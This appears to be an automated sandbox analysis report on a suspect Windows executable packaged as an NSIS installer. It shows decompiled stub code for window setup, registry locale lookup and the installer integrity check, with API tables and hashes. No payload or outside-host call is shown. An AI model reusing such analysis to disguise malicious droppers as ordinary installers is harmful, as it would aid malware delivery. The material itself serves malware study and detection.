                                                                                                0x00403b77
                                                                                                0x00403c6e
                                                                                                0x00403c7a
                                                                                                0x00403c81
                                                                                                0x00000000
                                                                                                0x004039d2
                                                                                                0x004039d2
                                                                                                0x004039d5
                                                                                                0x00403a08
                                                                                                0x00403a08
                                                                                                0x00403a0a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00403a0a
                                                                                                0x004039d7
                                                                                                0x004039db
                                                                                                0x004039e0
                                                                                                0x004039e2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004039f2
                                                                                                0x004039fa
                                                                                                0x00000000
                                                                                                0x00403a00
                                                                                                0x0040382e
                                                                                                0x0040382e
                                                                                                0x00403832
                                                                                                0x00403837
                                                                                                0x00403846
                                                                                                0x00403846
                                                                                                0x0040384f
                                                                                                0x00403858
                                                                                                0x00403863
                                                                                                0x00403863
                                                                                                0x0040386f
                                                                                                0x0040388b
                                                                                                0x0040388e
                                                                                                0x004038a1
                                                                                                0x004038a7
                                                                                                0x0040394a
                                                                                                0x00000000
                                                                                                0x00403953
                                                                                                0x004038ad
                                                                                                0x004038ba
                                                                                                0x004038bc
                                                                                                0x004038be
                                                                                                0x004038dd
                                                                                                0x004038dd
                                                                                                0x004038e0
                                                                                                0x004038e5
                                                                                                0x004038e8
                                                                                                0x004038f8
                                                                                                0x004038f9
                                                                                                0x004038fb
                                                                                                0x00403931
                                                                                                0x00403944
                                                                                                0x00000000
                                                                                                0x00403944
                                                                                                0x004038fd
                                                                                                0x00403903
                                                                                                0x0040391c
                                                                                                0x00403921
                                                                                                0x00403923
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00403925
                                                                                                0x00403911
                                                                                                0x00403911
                                                                                                0x00403913
                                                                                                0x00403913
                                                                                                0x00000000
                                                                                                0x00403913
                                                                                                0x00403906
                                                                                                0x0040390b
                                                                                                0x00000000
                                                                                                0x0040390b
                                                                                                0x004038ea
                                                                                                0x004038f0
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004038f2
                                                                                                0x00000000
                                                                                                0x004038f2
                                                                                                0x004038e2
                                                                                                0x00000000
                                                                                                0x004038e2
                                                                                                0x004038c8
                                                                                                0x004038cf
                                                                                                0x004038d5
                                                                                                0x004038d7
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004038d7
                                                                                                0x00403893
                                                                                                0x00000000
                                                                                                0x00403871
                                                                                                0x00403877
                                                                                                0x00403881
                                                                                                0x00403c87
                                                                                                0x00403c8d
                                                                                                0x00403c8f
                                                                                                0x00403c95
                                                                                                0x00403c9a
                                                                                                0x00403ca0
                                                                                                0x00403ca0
                                                                                                0x00403c95
                                                                                                0x00403caa
                                                                                                0x00000000
                                                                                                0x00403caa
                                                                                                0x0040386f

                                                                                                APIs
                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403846
                                                                                                • ShowWindow.USER32(?), ref: 00403863
                                                                                                • DestroyWindow.USER32 ref: 00403877
                                                                                                • SetWindowLongA.USER32 ref: 00403893
                                                                                                • GetDlgItem.USER32 ref: 004038B4
                                                                                                • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 004038C8
                                                                                                • IsWindowEnabled.USER32(00000000), ref: 004038CF
                                                                                                • GetDlgItem.USER32 ref: 0040397D
                                                                                                • GetDlgItem.USER32 ref: 00403987
                                                                                                • KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 004039A1
                                                                                                • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 004039F2
                                                                                                • GetDlgItem.USER32 ref: 00403A98
                                                                                                • ShowWindow.USER32(00000000,?), ref: 00403AB9
                                                                                                • EnableWindow.USER32(?,?), ref: 00403ACB
                                                                                                • EnableWindow.USER32(?,?), ref: 00403AE6
                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403AFC
                                                                                                • EnableMenuItem.USER32 ref: 00403B03
                                                                                                • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403B1B
                                                                                                • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403B2E
                                                                                                • lstrlenA.KERNEL32(00429FD8,?,00429FD8,jpfyweowskz Setup), ref: 00403B57
                                                                                                • SetWindowTextA.USER32(?,00429FD8), ref: 00403B66
                                                                                                • ShowWindow.USER32(?,0000000A), ref: 00403C9A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Window$Item$MessageSend$EnableShow$Menu$CallbackDestroyDispatcherEnabledLongSystemTextUserlstrlen
                                                                                                • String ID: jpfyweowskz Setup
                                                                                                • API String ID: 4050669955-4204252603
                                                                                                • Opcode ID: 43eaee0801e6aaf426ce723482984d0a7cd0caf67a9dfded40985b489c984417
                                                                                                • Instruction ID: 5403acdcc1aa6bbc142bc1e7719ab292303190a86846970e4bd25be8090c7a94
                                                                                                • Opcode Fuzzy Hash: 43eaee0801e6aaf426ce723482984d0a7cd0caf67a9dfded40985b489c984417
                                                                                                • Instruction Fuzzy Hash: DCC1B471A08204ABEB21AF62ED85E2B7E6CFB45706F40043EF541B51E1C779A942DF1E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00403489, Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 213stringregistrylibraryCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 96%
                                                                                                			E00403489() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				signed int _t24;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t39;
				int _t42;
				intOrPtr _t59;
				char _t61;
				CHAR* _t63;
				signed char _t67;
				struct HINSTANCE__* _t75;
				CHAR* _t78;
				intOrPtr _t80;
				CHAR* _t85;

				_t80 =  *0x42eb70; // 0x5ff628
				_t20 = E00405C49(6);
				_t87 = _t20;
				if(_t20 == 0) {
					_t78 = 0x429fd8;
					"1033" = 0x7830;
					E00405812(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x429fd8, 0);
					__eflags =  *0x429fd8;
					if(__eflags == 0) {
						E00405812(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x429fd8, 0);
					}
					lstrcatA("1033", _t78);
				} else {
					E00405889("1033",  *_t20() & 0x0000ffff);
				}
				E0040373D(_t75, _t87);
				_t24 =  *0x42eb78; // 0x80
				_t84 = "C:\\Users\\jones\\AppData\\Local\\Temp";
				 *0x42ebe0 = _t24 & 0x00000020;
				if(E004054FF(_t87, "C:\\Users\\jones\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E004054FF(_t95, _t84) == 0) {
						E0040594D(0, _t78, _t80, _t84,  *((intOrPtr*)(_t80 + 0x118)));
					}
					_t28 = LoadImageA( *0x42eb60, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x42e348 = _t28;
					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E0040373D(_t75, __eflags);
							__eflags =  *0x42ec00; // 0x0
							if(__eflags != 0) {
								_t31 = E00404D9B(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42e32c; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x429fb0, 5); // executed
							_t37 = LoadLibraryA("RichEd20"); // executed
							__eflags = _t37;
							if(_t37 == 0) {
								LoadLibraryA("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x42e300);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x42e300);
								 *0x42e324 = _t85;
								RegisterClassA(0x42e300);
							}
							_t39 =  *0x42e340; // 0x0
							_t42 = DialogBoxParamA( *0x42eb60, _t39 + 0x00000069 & 0x0000ffff, 0, E0040380A, 0); // executed
							E0040140B(5);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t75 =  *0x42eb60; // 0x400000
						 *0x42e314 = _t28;
						_v20 = 0x624e5f;
						 *0x42e304 = E00401000;
						 *0x42e310 = _t75;
						 *0x42e324 =  &_v20;
						if(RegisterClassA(0x42e300) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x429fb0 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42eb60, 0);
						goto L21;
					}
				} else {
					_t75 =  *(_t80 + 0x48);
					if(_t75 == 0) {
						goto L16;
					}
					_t59 =  *0x42eb98; // 0x603dec
					_t78 = 0x42db00;
					E00405812( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) + _t59, 0x42db00, 0);
					_t61 =  *0x42db00; // 0x63
					if(_t61 == 0) {
						goto L16;
					}
					if(_t61 == 0x22) {
						_t78 = 0x42db01;
						 *((char*)(E00405449(0x42db01, 0x22))) = 0;
					}
					_t63 = lstrlenA(_t78) + _t78 - 4;
					if(_t63 <= _t78 || lstrcmpiA(_t63, ?str?) != 0) {
						L15:
						E0040592B(_t84, E0040541E(_t78));
						goto L16;
					} else {
						_t67 = GetFileAttributesA(_t78);
						if(_t67 == 0xffffffff) {
							L14:
							E00405465(_t78);
							goto L15;
						}
						_t95 = _t67 & 0x00000010;
						if((_t67 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}





























                                                                                                0x0040348f
                                                                                                0x00403498
                                                                                                0x0040349f
                                                                                                0x004034a1
                                                                                                0x004034b5
                                                                                                0x004034c7
                                                                                                0x004034d1
                                                                                                0x004034d6
                                                                                                0x004034dc
                                                                                                0x004034ef
                                                                                                0x004034ef
                                                                                                0x004034fa
                                                                                                0x004034a3
                                                                                                0x004034ae
                                                                                                0x004034ae
                                                                                                0x004034ff
                                                                                                0x00403504
                                                                                                0x00403509
                                                                                                0x00403512
                                                                                                0x0040351e
                                                                                                0x004035a5
                                                                                                0x004035ad
                                                                                                0x004035b6
                                                                                                0x004035b6
                                                                                                0x004035cc
                                                                                                0x004035d2
                                                                                                0x004035e0
                                                                                                0x0040366f
                                                                                                0x00403677
                                                                                                0x00403681
                                                                                                0x00403686
                                                                                                0x0040368c
                                                                                                0x0040370b
                                                                                                0x00403710
                                                                                                0x00403712
                                                                                                0x0040372e
                                                                                                0x00000000
                                                                                                0x0040372e
                                                                                                0x00403714
                                                                                                0x0040371a
                                                                                                0x00403722
                                                                                                0x00403722
                                                                                                0x00000000
                                                                                                0x0040371a
                                                                                                0x00403696
                                                                                                0x004036a7
                                                                                                0x004036a9
                                                                                                0x004036ab
                                                                                                0x004036b2
                                                                                                0x004036b2
                                                                                                0x004036ba
                                                                                                0x004036c2
                                                                                                0x004036c4
                                                                                                0x004036c6
                                                                                                0x004036cf
                                                                                                0x004036d2
                                                                                                0x004036d8
                                                                                                0x004036d8
                                                                                                0x004036de
                                                                                                0x004036f7
                                                                                                0x00403701
                                                                                                0x00000000
                                                                                                0x00403706
                                                                                                0x00403679
                                                                                                0x0040367b
                                                                                                0x00000000
                                                                                                0x004035e6
                                                                                                0x004035e6
                                                                                                0x004035ec
                                                                                                0x004035f6
                                                                                                0x004035fe
                                                                                                0x00403608
                                                                                                0x0040360e
                                                                                                0x0040361c
                                                                                                0x00403733
                                                                                                0x00403733
                                                                                                0x00000000
                                                                                                0x00403733
                                                                                                0x00403622
                                                                                                0x0040362b
                                                                                                0x0040366a
                                                                                                0x00000000
                                                                                                0x0040366a
                                                                                                0x00403524
                                                                                                0x00403524
                                                                                                0x00403529
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040352e
                                                                                                0x00403533
                                                                                                0x00403543
                                                                                                0x00403548
                                                                                                0x0040354f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00403553
                                                                                                0x00403555
                                                                                                0x00403562
                                                                                                0x00403562
                                                                                                0x0040356a
                                                                                                0x00403570
                                                                                                0x00403598
                                                                                                0x004035a0
                                                                                                0x00000000
                                                                                                0x00403582
                                                                                                0x00403583
                                                                                                0x0040358c
                                                                                                0x00403592
                                                                                                0x00403593
                                                                                                0x00000000
                                                                                                0x00403593
                                                                                                0x0040358e
                                                                                                0x00403590
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00403590
                                                                                                0x00403570

                                                                                                APIs
                                                                                                  • Part of subcall function 00405C49: GetModuleHandleA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C5B
                                                                                                  • Part of subcall function 00405C49: LoadLibraryA.KERNELBASE(?,?,00000000,00403126,00000008), ref: 00405C66
                                                                                                  • Part of subcall function 00405C49: GetProcAddress.KERNEL32(00000000,?), ref: 00405C77
                                                                                                • lstrcatA.KERNEL32(1033,00429FD8,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FD8,00000000,00000006,"C:\Users\user\Desktop\xxTzyGLZx5.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004034FA
                                                                                                • lstrlenA.KERNEL32(cegrwbhzuj,?,?,?,cegrwbhzuj,00000000,C:\Users\user\AppData\Local\Temp,1033,00429FD8,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FD8,00000000,00000006,"C:\Users\user\Desktop\xxTzyGLZx5.exe" ), ref: 00403565
                                                                                                • lstrcmpiA.KERNEL32(?,.exe,cegrwbhzuj,?,?,?,cegrwbhzuj,00000000,C:\Users\user\AppData\Local\Temp,1033,00429FD8,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FD8,00000000), ref: 00403578
                                                                                                • GetFileAttributesA.KERNEL32(cegrwbhzuj), ref: 00403583
                                                                                                • LoadImageA.USER32 ref: 004035CC
                                                                                                  • Part of subcall function 00405889: wsprintfA.USER32 ref: 00405896
                                                                                                • RegisterClassA.USER32 ref: 00403613
                                                                                                • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 0040362B
                                                                                                • CreateWindowExA.USER32 ref: 00403664
                                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00403696
                                                                                                • LoadLibraryA.KERNELBASE(RichEd20), ref: 004036A7
                                                                                                • LoadLibraryA.KERNEL32(RichEd32), ref: 004036B2
                                                                                                • GetClassInfoA.USER32 ref: 004036C2
                                                                                                • GetClassInfoA.USER32 ref: 004036CF
                                                                                                • RegisterClassA.USER32 ref: 004036D8
                                                                                                • DialogBoxParamA.USER32 ref: 004036F7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                • String ID: "C:\Users\user\Desktop\xxTzyGLZx5.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$cegrwbhzuj$=`
                                                                                                • API String ID: 914957316-2214854557
                                                                                                • Opcode ID: ddebcaf873b3f80ffc25d6dfb232b9e28d9230a7995e8b1577ae424d02e99e0f
                                                                                                • Instruction ID: 2e12796d13047950d683a8fbe5a4005f9ba98cb8c12c36bead37cfa09a1e5f4f
                                                                                                • Opcode Fuzzy Hash: ddebcaf873b3f80ffc25d6dfb232b9e28d9230a7995e8b1577ae424d02e99e0f
                                                                                                • Instruction Fuzzy Hash: 4C61C5B0644244BED620AF629D45E273AACEB4575AF44443FF941B22E2D73DAD018A3E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00402C0B, Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 80%
                                                                                                			E00402C0B(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				signed int _t54;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t67;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\jones\\Desktop\\xxTzyGLZx5.exe";
				 *0x42eb6c = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\jones\\Desktop\\xxTzyGLZx5.exe", 0x400);
				_t89 = E00405602(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x409010 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\jones\\Desktop";
				E0040592B("C:\\Users\\jones\\Desktop", _t91);
				E0040592B(0x436000, E00405465(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x428b88 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402BB0(1);
					__eflags =  *0x42eb74 - _t82; // 0x33000
					if(__eflags == 0) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						_t54 =  *0x42eb74; // 0x33000
						E00403098(_t54 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff);
						_t57 = E00402E44();
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x42eb70 = _t94;
							 *0x42eb78 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x42eb7c =  *0x42eb7c + 1;
								__eflags =  *0x42eb7c;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E004055C3(0x42eb80, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E00403098( *0x414b78);
					_t65 = E00403066( &_a4, 4); // executed
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t67 =  *0x42eb74; // 0x33000
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~_t67 & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E00403066(0x420b88, _t90); // executed
						__eflags = _t71;
						if(_t71 == 0) {
							E00402BB0(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x42eb74;
						if( *0x42eb74 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402BB0(0);
							}
							goto L20;
						}
						E004055C3( &_v44, 0x420b88, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x414b78; // 0xcb782
						 *0x42ec00 =  *0x42ec00 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x42eb74 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t24 = _t80 - 4; // 0x409154
							_t93 = _t24;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x428b88; // 0xcb786
						if(__eflags < 0) {
							_v12 = E00405CB5(_v12, 0x420b88, _t90);
						}
						 *0x414b78 =  *0x414b78 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

































                                                                                                0x00402c13
                                                                                                0x00402c16
                                                                                                0x00402c19
                                                                                                0x00402c1c
                                                                                                0x00402c22
                                                                                                0x00402c33
                                                                                                0x00402c38
                                                                                                0x00402c4b
                                                                                                0x00402c50
                                                                                                0x00402c53
                                                                                                0x00402c59
                                                                                                0x00000000
                                                                                                0x00402c5b
                                                                                                0x00402c66
                                                                                                0x00402c6c
                                                                                                0x00402c7d
                                                                                                0x00402c84
                                                                                                0x00402c8a
                                                                                                0x00402c8c
                                                                                                0x00402c91
                                                                                                0x00402c93
                                                                                                0x00402d80
                                                                                                0x00402d82
                                                                                                0x00402d87
                                                                                                0x00402d8e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00402d90
                                                                                                0x00402d93
                                                                                                0x00402db7
                                                                                                0x00402dbc
                                                                                                0x00402dc2
                                                                                                0x00402dc4
                                                                                                0x00402dcd
                                                                                                0x00402dd2
                                                                                                0x00402dd5
                                                                                                0x00402dd6
                                                                                                0x00402dd7
                                                                                                0x00402dd9
                                                                                                0x00402dde
                                                                                                0x00402de1
                                                                                                0x00402df4
                                                                                                0x00402df8
                                                                                                0x00402e00
                                                                                                0x00402e05
                                                                                                0x00402e07
                                                                                                0x00402e07
                                                                                                0x00402e07
                                                                                                0x00402e0f
                                                                                                0x00402e0f
                                                                                                0x00402e12
                                                                                                0x00402e13
                                                                                                0x00402e13
                                                                                                0x00402e16
                                                                                                0x00402e18
                                                                                                0x00402e18
                                                                                                0x00402e18
                                                                                                0x00402e22
                                                                                                0x00402e28
                                                                                                0x00402e36
                                                                                                0x00402e3b
                                                                                                0x00000000
                                                                                                0x00402e3b
                                                                                                0x00000000
                                                                                                0x00402de1
                                                                                                0x00402d9b
                                                                                                0x00402da6
                                                                                                0x00402dab
                                                                                                0x00402dad
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00402db2
                                                                                                0x00402db5
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00402c99
                                                                                                0x00402c9e
                                                                                                0x00402c9e
                                                                                                0x00402ca3
                                                                                                0x00402ca7
                                                                                                0x00402cae
                                                                                                0x00402cb3
                                                                                                0x00402cb5
                                                                                                0x00402cb7
                                                                                                0x00402cb7
                                                                                                0x00402cbb
                                                                                                0x00402cc0
                                                                                                0x00402cc2
                                                                                                0x00402dec
                                                                                                0x00402de3
                                                                                                0x00000000
                                                                                                0x00402de3
                                                                                                0x00402cc8
                                                                                                0x00402ccf
                                                                                                0x00402d4b
                                                                                                0x00402d4f
                                                                                                0x00402d53
                                                                                                0x00402d58
                                                                                                0x00000000
                                                                                                0x00402d4f
                                                                                                0x00402cd8
                                                                                                0x00402cdd
                                                                                                0x00402ce0
                                                                                                0x00402ce5
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00402ce7
                                                                                                0x00402cee
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00402cf0
                                                                                                0x00402cf7
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00402cf9
                                                                                                0x00402d00
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00402d02
                                                                                                0x00402d09
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00402d0b
                                                                                                0x00402d11
                                                                                                0x00402d1a
                                                                                                0x00402d20
                                                                                                0x00402d23
                                                                                                0x00402d25
                                                                                                0x00402d2b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00402d31
                                                                                                0x00402d35
                                                                                                0x00402d3d
                                                                                                0x00402d3d
                                                                                                0x00402d40
                                                                                                0x00402d40
                                                                                                0x00402d43
                                                                                                0x00402d45
                                                                                                0x00402d47
                                                                                                0x00402d47
                                                                                                0x00000000
                                                                                                0x00402d45
                                                                                                0x00402d37
                                                                                                0x00402d3b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00402d59
                                                                                                0x00402d59
                                                                                                0x00402d5f
                                                                                                0x00402d6b
                                                                                                0x00402d6b
                                                                                                0x00402d6e
                                                                                                0x00402d74
                                                                                                0x00402d76
                                                                                                0x00402d76
                                                                                                0x00402d7e
                                                                                                0x00402d7e
                                                                                                0x00000000
                                                                                                0x00402d7e

                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32 ref: 00402C1C
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\xxTzyGLZx5.exe,00000400), ref: 00402C38
                                                                                                  • Part of subcall function 00405602: GetFileAttributesA.KERNELBASE(00000003,00402C4B,C:\Users\user\Desktop\xxTzyGLZx5.exe,80000000,00000003), ref: 00405606
                                                                                                  • Part of subcall function 00405602: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405628
                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\xxTzyGLZx5.exe,C:\Users\user\Desktop\xxTzyGLZx5.exe,80000000,00000003), ref: 00402C84
                                                                                                Strings
                                                                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402DE3
                                                                                                • soft, xrefs: 00402CF9
                                                                                                • C:\Users\user\Desktop, xrefs: 00402C66, 00402C6B, 00402C71
                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C0B
                                                                                                • "C:\Users\user\Desktop\xxTzyGLZx5.exe" , xrefs: 00402C15
                                                                                                • Null, xrefs: 00402D02
                                                                                                • Inst, xrefs: 00402CF0
                                                                                                • C:\Users\user\Desktop\xxTzyGLZx5.exe, xrefs: 00402C22, 00402C31, 00402C45, 00402C65
                                                                                                • Error launching installer, xrefs: 00402C5B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                • String ID: "C:\Users\user\Desktop\xxTzyGLZx5.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\xxTzyGLZx5.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
